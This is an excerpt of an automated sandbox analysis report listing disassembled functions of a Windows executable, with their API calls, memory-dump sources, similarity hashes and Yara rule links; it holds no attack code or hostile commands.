                                                                                                                                              • API ID: DriveDrivesLogicalMessageType
                                                                                                                                              • String ID: %c:\$\Disk Images\$\Disk Images\Disk%d
                                                                                                                                              • API String ID: 1359937597-868800301
                                                                                                                                              • Opcode ID: 42e1eaf1bff76668b61a5634081314ccc6a254b27d15284cf4f303d86f70a8b2
                                                                                                                                              • Instruction ID: 8afbe327e4d74a6595be96fadd5310b57a40e0fcd72e5554749058cd2a1246b8
                                                                                                                                              • Opcode Fuzzy Hash: 42e1eaf1bff76668b61a5634081314ccc6a254b27d15284cf4f303d86f70a8b2
                                                                                                                                              • Instruction Fuzzy Hash: 7061D2712043409BD330DB94DC81FEBB7E9EBC9310F44091FFA8987241EA79A945CB6A
                                                                                                                                              Function 00432594 Relevance: 10.7, APIs: 7, Instructions: 169COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCPInfo.KERNEL32(?,?,0044EB50,00000038,0042C533,?,00000000,?,?,00000000,00000000,0044D190,0000001C,0042CD7C,00000001,?), ref: 004325D2
                                                                                                                                              • GetCPInfo.KERNEL32(?,00000001,?,?,0042C39D,?,?,00000008,?,?,00424C62,?,?,?,?,00402BBF), ref: 004325E5
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,0042C39D,?,?,00000008,?,?,00424C62,?), ref: 0043262A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Info$ByteCharMultiWide
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1166650589-0
                                                                                                                                              • Opcode ID: be422299c7746ac2b38f3bb3e6242e5a1681e52eba28ec17eee5157774e3f445
                                                                                                                                              • Instruction ID: ea13df6ffc39fcabe32b01fc689c9ae28562827eed5415b20872082be15f5b55
                                                                                                                                              • Opcode Fuzzy Hash: be422299c7746ac2b38f3bb3e6242e5a1681e52eba28ec17eee5157774e3f445
                                                                                                                                              • Instruction Fuzzy Hash: E6519C70901218FBCF218F65ED858AFBBB8FF89750F20512AF814A2250D7755D41CB68
                                                                                                                                              Function 004387D2 Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetParent.USER32(?), ref: 00438800
                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00438827
                                                                                                                                              • UpdateWindow.USER32(?), ref: 00438841
                                                                                                                                              • SendMessageA.USER32(?,00000121,00000000,?), ref: 00438865
                                                                                                                                              • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 0043887F
                                                                                                                                              • UpdateWindow.USER32(?), ref: 004388C5
                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004388F9
                                                                                                                                                • Part of subcall function 00437534: GetWindowLongA.USER32(?,000000F0), ref: 0043753F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2853195852-0
                                                                                                                                              • Opcode ID: b13282f9b8ac6db00a8496b55bdebc49f6485c126065f6b24774a09cd2d7802b
                                                                                                                                              • Instruction ID: 084587f8be8d29286b758f10d7e9662302e5aba9923b57fea7a2f2edceff8d6b
                                                                                                                                              • Opcode Fuzzy Hash: b13282f9b8ac6db00a8496b55bdebc49f6485c126065f6b24774a09cd2d7802b
                                                                                                                                              • Instruction Fuzzy Hash: 3E410330208741AFDB25AF26DC44A2BFAF0FFC9B44F50192EF581911A1CB3AC905CA5A
                                                                                                                                              Function 00443492 Relevance: 10.6, APIs: 7, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82), ref: 004434A2
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 004434C0
                                                                                                                                              • LocalAlloc.KERNEL32(00000000,?,00000010,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83), ref: 0044351C
                                                                                                                                              • LocalReAlloc.KERNEL32(?,?,00000002,00000010,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66), ref: 0044352E
                                                                                                                                              • LeaveCriticalSection.KERNEL32(0047EB28,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 0044353B
                                                                                                                                              • TlsSetValue.KERNEL32(?,00000000), ref: 0044356B
                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 0044358C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 784703316-0
                                                                                                                                              • Opcode ID: eec5c9af0761aab35826935f94150f19e31b1a8781ee2cce32ef685509deae95
                                                                                                                                              • Instruction ID: c920ea616b6941ccf4a41ae28c234557be8e43c86538256f6915913f71204ac3
                                                                                                                                              • Opcode Fuzzy Hash: eec5c9af0761aab35826935f94150f19e31b1a8781ee2cce32ef685509deae95
                                                                                                                                              • Instruction Fuzzy Hash: 2F31ABB1500615BFEB24EF55D885C6ABBA8FB057117108A2EE81683610CB34FE50CB99
                                                                                                                                              Function 00422D35 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00422D73
                                                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 00422D8B
                                                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 00422D92
                                                                                                                                              • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 00422DB8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                                                                                              • String ID: B$DISPLAY
                                                                                                                                              • API String ID: 2307409384-3316187204
                                                                                                                                              • Opcode ID: 9cba5b6c645de5270ad7bb0fc0d991fcef33e3317d4237bbf04082c5b1e7876e
                                                                                                                                              • Instruction ID: 3a1a5f33e973a52794829ba86540b2c4864c641d0816d9ff10fb2a82ff3ca36e
                                                                                                                                              • Opcode Fuzzy Hash: 9cba5b6c645de5270ad7bb0fc0d991fcef33e3317d4237bbf04082c5b1e7876e
                                                                                                                                              • Instruction Fuzzy Hash: 6111A371710334BBCF119F64AD8475BBBA9FF06B50B808466FD05AA145C2F4D801CBA9
                                                                                                                                              Function 00414930 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                                                • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                                                • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                                                • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                                                • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressDirectoryLibraryLoadProc$PathSystemTempWindows
                                                                                                                                              • String ID: %s\%s$CopyFileExA$KERNEL32.DLL$regsvr32.exe
                                                                                                                                              • API String ID: 497994091-3394410207
                                                                                                                                              • Opcode ID: f1068f767d1700a680734e17c4b62072ec67806eae000909974e6ca04aa6b552
                                                                                                                                              • Instruction ID: dbb7616a5e8e18c7340fb9c6e1b10d6890d2dd053081ddfc01aae21a589600a4
                                                                                                                                              • Opcode Fuzzy Hash: f1068f767d1700a680734e17c4b62072ec67806eae000909974e6ca04aa6b552
                                                                                                                                              • Instruction Fuzzy Hash: 6B112570108340AFD318DF54DC06BDA7BA4E745B15F400A2EB595932D2EB7C5144CB5A
                                                                                                                                              Function 00443AEC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,0043D1B4,?,?,?,?,75920A60,00000000,?,00425801,00000000), ref: 00443AF5
                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,00425801,00000000), ref: 00443AFD
                                                                                                                                              • GetModuleHandleA.KERNEL32(user32.dll,00425801,00000000), ref: 00443B48
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 00443B58
                                                                                                                                                • Part of subcall function 0044399E: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 004439DF
                                                                                                                                                • Part of subcall function 0044399E: PathFindExtensionA.SHLWAPI(?), ref: 004439F9
                                                                                                                                                • Part of subcall function 0044399E: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00443A93
                                                                                                                                                • Part of subcall function 0044399E: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 00443AC0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                                                                                              • String ID: NotifyWinEvent$user32.dll
                                                                                                                                              • API String ID: 4004864024-597752486
                                                                                                                                              • Opcode ID: eced104bb2dd26ae009b150a134447d401b323aa7f3da8792df851434d666933
                                                                                                                                              • Instruction ID: dbd96a4b6eaa2b3b5d1619ca9b628c41ce02e38444e38533f865fee5f1778688
                                                                                                                                              • Opcode Fuzzy Hash: eced104bb2dd26ae009b150a134447d401b323aa7f3da8792df851434d666933
                                                                                                                                              • Instruction Fuzzy Hash: BE018B74A003515FE710AF25D849B0E3BE8AF44B05F0684AFF448C7262DB78D945CB6E
                                                                                                                                              Function 004294D7 Relevance: 9.2, APIs: 6, Instructions: 197COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004318D6: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431948
                                                                                                                                              • __allrem.LIBCMT ref: 004295EA
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042960B
                                                                                                                                              • __allrem.LIBCMT ref: 00429627
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042964A
                                                                                                                                              • __allrem.LIBCMT ref: 00429666
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00429689
                                                                                                                                                • Part of subcall function 0042DE95: __lock.LIBCMT ref: 0042DEA3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1282128132-0
                                                                                                                                              • Opcode ID: 2b8efb0c4cd6615b4bf4a7a735cd704fbe2f32d7777add60ba098c4bbfda7f1b
